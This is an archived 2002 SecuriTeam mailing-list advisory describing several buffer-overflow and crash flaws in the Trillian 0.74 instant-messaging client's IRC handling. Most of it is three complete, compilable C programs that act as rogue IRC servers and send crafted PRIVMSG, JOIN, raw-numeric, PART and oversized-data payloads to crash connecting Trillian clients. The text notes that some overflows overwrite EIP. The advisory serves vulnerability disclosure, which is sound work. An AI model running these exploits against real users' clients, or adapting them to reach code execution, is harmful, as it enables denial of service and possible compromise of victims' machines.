[NT] Multiple Trillian Security Vulnerabilities
From: support@securiteam.comDate: 09/25/02
- Previous message: support@securiteam.com: "[EXPL] vBulletin Calendar Command Execution Vulnerability (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 25 Sep 2002 11:06:25 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Multiple Trillian Security Vulnerabilities
------------------------------------------------------------------------
SUMMARY
Trillian is a popular Instant Messaging client, which supports
ICQ/AIM/Yahoo/MSN and IRC. The product has been found to contain multiple
security vulnerabilities allowing a remote attacker to cause the product
to crash some of the vulnerabilities will overwrite the EIP (allowing a
remote attacker to cause the product to execute arbitrary code).
DETAILS
Vulnerable systems:
* Trillian version 0.74 and prior
PRIVMSG overflow:
An overflow exists in the way Trillian processes 'PRIVMSG' commands from
the IRC server. If the nickname of the sender is larger than 206 bytes,
Trillian will crash and overwrite registers.
JOIN overflow:
An overflow exists in the way Trillian processes 'JOIN' commands from the
IRC server. If Trillian joins a channel that is larger than 206 bytes,
Trillian will crash and overwrite registers.
Multiple Raw flaws:
There seems to be a flaw in the way Trillian processes some IRC Raw
Messages, the following RAW messages crash Trillian:
206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367
The server sends the RAW commands in the following format: ':Server
<Num>', where <Num> being the one of the raw codes listed above.
Part flaw:
If Trillian receives a message about a user parting a channel it itself is
not in, or if no channel is specified at all, Trillian will crash.
Part Messages are sent in the form: ":nick!ident@address PART <Channel>"
Data buffering flaw:
There appears to be a flaw in the way Trillian buffers data from the IRC
server. If Trillian receives a block of data over 4095 bytes, Trillian
will crash.
Exploit code to reproduce flaws:
/* Trillian-Dos.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits Multiple Trillian DoS Flaws:
Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
333,
352, 367
Part Flaw
Data length flaw.
Tested On Version .74
Compiles with Borland 5.5 Commandline Tools.
These Examples Will Just DoS The Trillian Client,
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
SOCKET s;
#define SERVER ":server "
#define PART ":nick!ident@address PART\n"
int main(int argc, char *argv[]) {
SOCKET TempSock = SOCKET_ERROR;
WSADATA WsaDat;
SOCKADDR_IN Sockaddr;
int nRet;
char payload[4096];
if (argc < 2) {
usage();
return 1;
}
if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw")) &&
(strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) {
usage();
return 1;
}
printf("Listening on port 6667 for connections....\n");
if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
printf("ERROR: WSA Initialization failed.");
return 0;
}
/* Create Socket */
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET) {
printf("ERROR: Could Not Create Socket. Exiting\n");
WSACleanup();
return 0;
}
Sockaddr.sin_port = htons(6667);
Sockaddr.sin_family = AF_INET;
Sockaddr.sin_addr.s_addr = INADDR_ANY;
nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
printf("ERROR Binding Socket");
WSACleanup();
return 0;
}
/* Make Socket Listen */
if (listen(s, 10) == SOCKET_ERROR) {
printf("ERROR: Couldnt Make Listening Socket\n");
WSACleanup();
return 0;
}
while (TempSock == SOCKET_ERROR) {
TempSock = accept(s, NULL, NULL);
}
printf("Client Connected, Sending Payload\n");
if (!strcmp(argv[1],"part")) {
send(TempSock,PART,strlen(PART),0);
}
if (!strcmp(argv[1],"raw")) {
send(TempSock,SERVER,strlen(SERVER),0);
send(TempSock,argv[2],strlen(argv[2]),0);
send(TempSock,"\n",1,0);
}
if (!strcmp(argv[1],"data")) {
memset(payload,'A',4096);
send(TempSock,payload,strlen(payload),0);
}
printf("Exiting\n");
sleep(100);
WSACleanup();
return 0;
}
usage() {
printf("\nTrillian Multiple DoS Flaws\n");
printf("---------------------------\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74\n\n");
printf("Usage: Trillian-Dos <type> [num]\n");
printf("Type: raw, part, data\n");
printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
333, 352, 367\n\n");
}
/* Trillian-Join.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits the Trillian Join Flaw.
Tested On Version .74 and .73
Compiles with Borland 5.5 Commandline Tools.
This Example Will Just DoS The Trillian Client,
not particularly useful, just proves the flaw exists.
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
SOCKET s;
#define MSG1 ":server 001 target :target\n:target!ident@address JOIN :"
int main() {
SOCKET TempSock = SOCKET_ERROR;
WSADATA WsaDat;
SOCKADDR_IN Sockaddr;
int nRet;
char payload[300];
printf("\nTrillian Join Flaw\n");
printf("----------------------\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74 and .73\nListening On Port 6667 For
Connections\n\n");
if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
printf("ERROR: WSA Initialization failed.");
return 0;
}
/* Create Socket */
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET) {
printf("ERROR: Could Not Create Socket. Exiting\n");
WSACleanup();
return 0;
}
Sockaddr.sin_port = htons(6667);
Sockaddr.sin_family = AF_INET;
Sockaddr.sin_addr.s_addr = INADDR_ANY;
nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
printf("ERROR Binding Socket");
WSACleanup();
return 0;
}
/* Make Socket Listen */
if (listen(s, 10) == SOCKET_ERROR) {
printf("ERROR: Couldnt Make Listening Socket\n");
WSACleanup();
return 0;
}
while (TempSock == SOCKET_ERROR) {
TempSock = accept(s, NULL, NULL);
}
printf("Client Connected, Sending Payload\n");
send(TempSock,MSG1,strlen(MSG1),0);
memset(payload,'A',300);
send(TempSock,payload,strlen(payload),0);
send(TempSock,"\n",1,0);
printf("Exiting\n");
sleep(100);
WSACleanup();
return 0;
}
/* Trillian-Privmsg.c
Author: Lance Fitz-Herbert
Contact: IRC: Phrizer, DALnet - #KORP
ICQ: 23549284
Exploits the Trillian Privmsg Flaw.
Tested On Version .74 and .73
Compiles with Borland 5.5 Commandline Tools.
This Example Will Just DoS The Trillian Client,
not particularly useful, just proves the flaw exists.
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>
SOCKET s;
#define MSG1 ":server 001 target :target\n:"
#define MSG2 "!ident@address PRIVMSG target :You are the weakest link,
Goodbye.\n"
int main() {
SOCKET TempSock = SOCKET_ERROR;
WSADATA WsaDat;
SOCKADDR_IN Sockaddr;
int nRet;
char payload[300];
printf("\nTrillian Privmsg Flaw\n");
printf("----------------------\n");
printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
printf("Tested On Version .74 and .73\nListening On Port 6667 For
Connections\n\n");
if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
printf("ERROR: WSA Initialization failed.");
return 0;
}
/* Create Socket */
s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s == INVALID_SOCKET) {
printf("ERROR: Could Not Create Socket. Exiting\n");
WSACleanup();
return 0;
}
Sockaddr.sin_port = htons(6667);
Sockaddr.sin_family = AF_INET;
Sockaddr.sin_addr.s_addr = INADDR_ANY;
nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
if (nRet == SOCKET_ERROR) {
printf("ERROR Binding Socket");
WSACleanup();
return 0;
}
/* Make Socket Listen */
if (listen(s, 10) == SOCKET_ERROR) {
printf("ERROR: Couldnt Make Listening Socket\n");
WSACleanup();
return 0;
}
while (TempSock == SOCKET_ERROR) {
TempSock = accept(s, NULL, NULL);
}
printf("Client Connected, Sending Payload\n");
send(TempSock,MSG1,strlen(MSG1),0);
memset(payload,'A',300);
send(TempSock,payload,strlen(payload),0);
send(TempSock,MSG2,strlen(MSG2),0);
printf("Exiting\n");
sleep(100);
WSACleanup();
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:fitzies@hotmail.com> Lance
Fitz-Herbert.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[EXPL] vBulletin Calendar Command Execution Vulnerability (Exploit)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
